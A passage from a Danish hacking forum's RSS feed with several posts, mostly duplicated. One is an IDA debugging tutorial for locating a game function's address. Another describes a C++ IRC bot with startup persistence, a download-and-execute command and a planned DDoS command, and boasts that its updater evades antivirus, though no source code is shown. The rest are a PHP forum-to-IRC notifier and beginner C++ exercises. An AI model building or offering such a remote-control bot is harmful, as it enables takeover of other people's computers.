			cout << "Round: " << roundNum << endl;

			roundNum++;	

			attackPlayer();

			attackMob();
funktionen som angriber mob er så attackMob()

Det vi nu skal gøre er at finde ud af hvor denne funktion ligger i memory når programmet køres. Her vil vi benytte IDA.
Vi starter IDA op og vælger at vi godt vil rode med vores egen fil(Go: Work on your own):
[Billede: 4tyiY.jpg]
Herefter trækker du blot filen mobGame.exe ind i IDA

Vi vil nu blive præsenteret for en anden skærm. Her trykker du blot "ok".
[Billede: 4tykX.png]

Vores .exe mobGame skulle nu gerne være loadet i IDA. Vælg graph view, da det efter min mening er det bedste(Højreklik midt i IDA og tryk graph view. Hvis muligheden ikke er der, er du allerede i graph view)
Det vi gør nu er at kigge på de forskellige ting og ser om vi kan finde noget som giver mening.
Vi kan hurtigt se vores if else statement hvor vi tjekker for hvilke valg der er truffet. Hvis der bliver trykket 1 så går vi til angreb, og hvis vi trykker 2 så flygter vi(programmet afsluttes)
[Billede: 4txvS.png]
Her kan vi tydeligt se hvad for et stykke kode den er igang med. Vi kan også se hvordan den sammenligner choice, med et nummer.
Først flyttes choice over i eax cpu registret.
mov	    eax, [esp+8+choice]
så sammenlignes eax med 1
cmp    eax, 1
Så kommet jnz. Jump if not zero
jnz	short loc_401340
Der bliver hoppet til loc_401340 hvis eax ikke er lig 1
Ellers fortsættes koden bare nedtil det spændende stykke. Nemlig inde i denne if statement:
if(choice==1)
og det er jo netop inde i denne if statement hvor de to funktioner attackMob og attackPlayer bliver kaldt.

Her ser vi et billed af funktionen i assembly:
[Billede: 4txD4.png]
Her ser vi et billed af funktionen i C++:
[Billede: 4txEx.png]

Her kan vi let se hvad det er der sker. Hvordan noget tekst i 2 omgange bliver push'et på stacken og herefter printet ved brug af cout.
Men længere nede ser vi 2 call's som går til attackPlayer og attackMob.
[Billede: 4txGT.png]
Dette er præcis hvad vi har ledt efter.
Vi kan nu se et call til attackMob. Vi klikker nu på attackMob for at se hvad der gemmer sig bag det call.
Meget hurtigt ved et lille kig kan vi se at det er den helt rigtige funktion vi har fat i. Vi klikker nu på den lille tilbage knap oppe i venstre hjørne af IDA for at komme tilbage til start.
Vi sætter nu et breakpoint ved attackMob ved at højreklikke på attackMob og klikke Add Breakpoint.
[Billede: 4txNf.png]
Det call til attackMob vil nu blive rødt.
[Billede: 4txO3.png]

Vi er nu klar til at køre vores program, så den kan stoppe ved breakpoint og fortælle den præcise lokation i memory.
I toppen af IDA, kan vi se en start button, samt pause og en stop
[Billede: 4txR0.png]
Her vælger vi Local Win32 debugger og trykker start
[Billede: 4txRk.png]

Et nyt vindue vil nu åbne, hvor vi kan se vores spil. Her vil vi trykke 1 for at angribe, så den rammer vores breakpoint ved attackMob

Her kan vi nu se at mob angriber player men så stopper/pauser programmet ved vores breakpoint
[Billede: 4txVa.png]
I IDA kan vi også se at den er stoppet ved det rigtige sted
[Billede: 4txXo.png]

Vi kan nu se den præcise lokation som er 003C1339 eller 0x003C1339
Vi har nu fundet funktionens præcise addresse. Denne vil blive brugt i den næste tutorial så følg med.]]> <![CDATA[[C++/C] IRC Bot]]> https://www.shellsec.pw/traad-c-c-irc-bot Mon, 13 May 2013 23:33:11 +0200 https://www.shellsec.pw/traad-c-c-irc-bot
Første IRC bot i c++. Så don't hate.
Konstruktiv kritik modtages meget gerne.
Skriv evt. hvis i vil have nogle funktioner eller noget i den :)
Compiler command: g++ -mwindows ircbotc2.cpp addstartup.cpp
Compilet under windows 8 med cygwin.
Download: (Out-dated download link)

Funktioner
  • !HELP - Viser guide til commands
  • !UPDATE - Opdatere botten til en nyere version med det link du giver den.
  • !DDOS - DDoS funktion (Not implemented)
  • !EXECUTE - Henter fil fra URL og eksekvere den på systemet


OBS: Hvis folk har problemer med compilere, kildekode osv. Kan i til hver en tid blot skrive i denne tråd hvis jeg skal lave en binary til jer. Så bare skriv hvad jeres fulde navn(altså på IRC) er + hvad channel den skal joine. Så skal jeg nok compile en til jer :)


EDIT: Opdateret 5-27-2013 og nu tilføjet en update funktion så man nu kan opdatere den til at downloade en ny executable. Opdaterings funktionen bruger Berkeley sockets til at snakke med HTTP protokollen og hente en given fil.
Ja det er nok meget at skrive 130 linjer for en download funktion, men så er den til gengæld også FUD. Hvis man bruger one-lineren http://msdn.microsoft.com/en-us/library/...s.85).aspx er den detected med det samme.
Desuden er min nu også cross compatible. Dog skal der fixes nogle paths hvis den skal ud på andre operativ systemer end windows.
Testet på windows 8 x64.

ircbotv2.cpp (Click to View)
addstartup.h (Click to View)
addstartup.cpp (Click to View)
update.h (Click to View)
update.cpp (Click to View)
tools.h (Click to View)
tools.cpp (Click to View)
]]>
Første IRC bot i c++. Så don't hate.
Konstruktiv kritik modtages meget gerne.
Skriv evt. hvis i vil have nogle funktioner eller noget i den :)
Compiler command: g++ -mwindows ircbotc2.cpp addstartup.cpp
Compilet under windows 8 med cygwin.
Download: (Out-dated download link)

Funktioner
  • !HELP - Viser guide til commands
  • !UPDATE - Opdatere botten til en nyere version med det link du giver den.
  • !DDOS - DDoS funktion (Not implemented)
  • !EXECUTE - Henter fil fra URL og eksekvere den på systemet


OBS: Hvis folk har problemer med compilere, kildekode osv. Kan i til hver en tid blot skrive i denne tråd hvis jeg skal lave en binary til jer. Så bare skriv hvad jeres fulde navn(altså på IRC) er + hvad channel den skal joine. Så skal jeg nok compile en til jer :)


EDIT: Opdateret 5-27-2013 og nu tilføjet en update funktion så man nu kan opdatere den til at downloade en ny executable. Opdaterings funktionen bruger Berkeley sockets til at snakke med HTTP protokollen og hente en given fil.
Ja det er nok meget at skrive 130 linjer for en download funktion, men så er den til gengæld også FUD. Hvis man bruger one-lineren http://msdn.microsoft.com/en-us/library/...s.85).aspx er den detected med det samme.
Desuden er min nu også cross compatible. Dog skal der fixes nogle paths hvis den skal ud på andre operativ systemer end windows.
Testet på windows 8 x64.

ircbotv2.cpp (Click to View)
addstartup.h (Click to View)
addstartup.cpp (Click to View)
update.h (Click to View)
update.cpp (Click to View)
tools.h (Click to View)
tools.cpp (Click to View)
]]> <![CDATA[[C++] IRC bot til overvågning af forum posts]]> https://www.shellsec.pw/traad-c-irc-bot-til-overvaagning-af-forum Wed, 24 Apr 2013 18:17:43 +0200 https://www.shellsec.pw/traad-c-irc-bot-til-overvaagning-af-forum Dette er en IRC bot, der placerer sig på vores IRC channel og holder fast i forbindelsen indtil den skal noget. Samtidig åbnes en socket, som er klar til at modtage data der skal skrives i chatten. Skide genialt, da dette kan bruges i samarbejde med en masse andre programmer, her bruger vi den så sammen med MyBB, så derfor har jeg kaldt den BB2IRC.

Det den gør er simpelt, når en besked bliver oprettet på forummet, sendes en besked til bottens åbne socket (INC_IP:INC_PORT).
Med PHP har jeg gjort dette med noget så simpelt som dette:
<?php

        $msgtype = array("oprettet en tråd med titlen", "besvaret tråden");

        $title = $_GET['title'];

        $user = $_GET['user'];

        $link = "http://shellsec.pw/showthread.php?tid=" . $_GET['tid'] . "&pid=" . $_GET['pid'] . "#pid" . $_GET['pid'];

        $msg = $user . " har " . $msgtype[$_GET['type']] . " \"" . $title . "\"" . $INC_DELIM . $link;

 

        $sockfd = fsockopen($INC_IP, $INC_PORT, $errno, $errstr, 120);

        if(!$sockfd){

                die();

        }else{

                fwrite($sockfd, $msg);

                fclose($sockfd);

        }

?>

Et eksempel på en besked oprettes således ved en query til serveren med denne querystring:
?user=Doctor%20Blue&type=0&title=[C++]%20IRC%20bot%20til%20overvågning%20af%20forum%20posts&tid=207&pid=
$INC_DELIM repræsenterer det tegn, der også sættes som konstanten INC_DELIM i botten, og er altså det tegn der indikerer en ny linje.
Output vil altså være:
Citer:Botnick: Doctor Blue har oprettet en tråd med titlen [C++] IRC bot til overvågning af forum posts
Botnick: http://shellsec.pw/showthread.php?tid=207&pid=#pid

og så har vi selve botten her:
botten (Click to View)
Hele molevitten er cross-compatible, altså det funger på Linux og Windows, og i princippet burde det også virke på Mac, men jeg har ikke testet :)

Hyggehejsa, nyd mit arbejde når Morph får det op at køre :)]]> Dette er en IRC bot, der placerer sig på vores IRC channel og holder fast i forbindelsen indtil den skal noget. Samtidig åbnes en socket, som er klar til at modtage data der skal skrives i chatten. Skide genialt, da dette kan bruges i samarbejde med en masse andre programmer, her bruger vi den så sammen med MyBB, så derfor har jeg kaldt den BB2IRC.

Det den gør er simpelt, når en besked bliver oprettet på forummet, sendes en besked til bottens åbne socket (INC_IP:INC_PORT).
Med PHP har jeg gjort dette med noget så simpelt som dette:
<?php

        $msgtype = array("oprettet en tråd med titlen", "besvaret tråden");

        $title = $_GET['title'];

        $user = $_GET['user'];

        $link = "http://shellsec.pw/showthread.php?tid=" . $_GET['tid'] . "&pid=" . $_GET['pid'] . "#pid" . $_GET['pid'];

        $msg = $user . " har " . $msgtype[$_GET['type']] . " \"" . $title . "\"" . $INC_DELIM . $link;

 

        $sockfd = fsockopen($INC_IP, $INC_PORT, $errno, $errstr, 120);

        if(!$sockfd){

                die();

        }else{

                fwrite($sockfd, $msg);

                fclose($sockfd);

        }

?>

Et eksempel på en besked oprettes således ved en query til serveren med denne querystring:
?user=Doctor%20Blue&type=0&title=[C++]%20IRC%20bot%20til%20overvågning%20af%20forum%20posts&tid=207&pid=
$INC_DELIM repræsenterer det tegn, der også sættes som konstanten INC_DELIM i botten, og er altså det tegn der indikerer en ny linje.
Output vil altså være:
Citer:Botnick: Doctor Blue har oprettet en tråd med titlen [C++] IRC bot til overvågning af forum posts
Botnick: http://shellsec.pw/showthread.php?tid=207&pid=#pid

og så har vi selve botten her:
botten (Click to View)
Hele molevitten er cross-compatible, altså det funger på Linux og Windows, og i princippet burde det også virke på Mac, men jeg har ikke testet :)

Hyggehejsa, nyd mit arbejde når Morph får det op at køre :)]]> <![CDATA[[C++] eBooks Wanted!]]> https://www.shellsec.pw/traad-c-ebooks-wanted Sun, 07 Apr 2013 20:09:03 +0200 https://www.shellsec.pw/traad-c-ebooks-wanted
Hvis nogen af jer "der ude" sidder med nogle ebooks som i vil dele med mig, enten i den her tråd eller over pm.

Vici Fides]]>
Hvis nogen af jer "der ude" sidder med nogle ebooks som i vil dele med mig, enten i den her tråd eller over pm.

Vici Fides]]> <![CDATA[[C++] Begynder opgaver]]> https://www.shellsec.pw/traad-c-begynder-opgaver Tue, 02 Apr 2013 19:39:31 +0200 https://www.shellsec.pw/traad-c-begynder-opgaver
Jeg er faldet over en side med begynder opgaver til C++, hvor jeg tænkte at det kunne være meget sjovt at se jeres input til disse. Jeg har tænkt mig skamløst at kopiere (og oversætte) opgaveformuleringen fra siden, så alt credit til http://www.cplusplus.com/forum/articles/12974/.

Bemærk at jeg skriver i C++ 4.3.

1: Simpelt while-loop
Skriv et program hvor computeren bliver ved med at spørge efter et givent tal, og først stopper når brugeren har indtastet det. Hvis brugeren så taster det givne tal kommer computeren med meddelsen "Du måtte ikke skrive X". Efter programmet har kørt 10 gange uden at brugeren har tastet X ind skal meddelsen "Du vandt" komme op. Twist: Lav det, så X er det antal gange programmet har kørt, altså 1. gang det kører er tallet 0, 2. gang 1 osv.

Min løsning til opgaven (Click to View)


2. Gæt computerens tal
Overskriften siger det meste: Computeren tænker på et tilfældigt generet tal mellem 1 og 100, og du skal gætte det. Hver gang du gætter på et tal fortæller computeren dig om dit gæt er højere eller lavere i forhold til det rigtige tal.

Min løsning til opgaven (Click to View)


3. Lad computeren gætte dit tal
Det her er så den omvendte version af det foregående program. Her skal computeren så gætte dit tal mellem 1 og 100 ved at du fortæller den om dit tal er højere eller lavere end dens gæt. Twist: Computeren må maks bruge 7 forsøg på at gætte dit tal.

Min løsning til opgaven (Click to View)

4: Kryds og bolle
2-players kryds og bolle spil

[Billede: 2ur5n]

Min løsning til opgaven (Click to View)

Hvis stemningen er for det vil jeg løbende opdatere tråden med flere og sværere opgaver.]]>
Jeg er faldet over en side med begynder opgaver til C++, hvor jeg tænkte at det kunne være meget sjovt at se jeres input til disse. Jeg har tænkt mig skamløst at kopiere (og oversætte) opgaveformuleringen fra siden, så alt credit til http://www.cplusplus.com/forum/articles/12974/.

Bemærk at jeg skriver i C++ 4.3.

1: Simpelt while-loop
Skriv et program hvor computeren bliver ved med at spørge efter et givent tal, og først stopper når brugeren har indtastet det. Hvis brugeren så taster det givne tal kommer computeren med meddelsen "Du måtte ikke skrive X". Efter programmet har kørt 10 gange uden at brugeren har tastet X ind skal meddelsen "Du vandt" komme op. Twist: Lav det, så X er det antal gange programmet har kørt, altså 1. gang det kører er tallet 0, 2. gang 1 osv.

Min løsning til opgaven (Click to View)


2. Gæt computerens tal
Overskriften siger det meste: Computeren tænker på et tilfældigt generet tal mellem 1 og 100, og du skal gætte det. Hver gang du gætter på et tal fortæller computeren dig om dit gæt er højere eller lavere i forhold til det rigtige tal.

Min løsning til opgaven (Click to View)


3. Lad computeren gætte dit tal
Det her er så den omvendte version af det foregående program. Her skal computeren så gætte dit tal mellem 1 og 100 ved at du fortæller den om dit tal er højere eller lavere end dens gæt. Twist: Computeren må maks bruge 7 forsøg på at gætte dit tal.

Min løsning til opgaven (Click to View)

4: Kryds og bolle
2-players kryds og bolle spil

[Billede: 2ur5n]

Min løsning til opgaven (Click to View)

Hvis stemningen er for det vil jeg løbende opdatere tråden med flere og sværere opgaver.]]>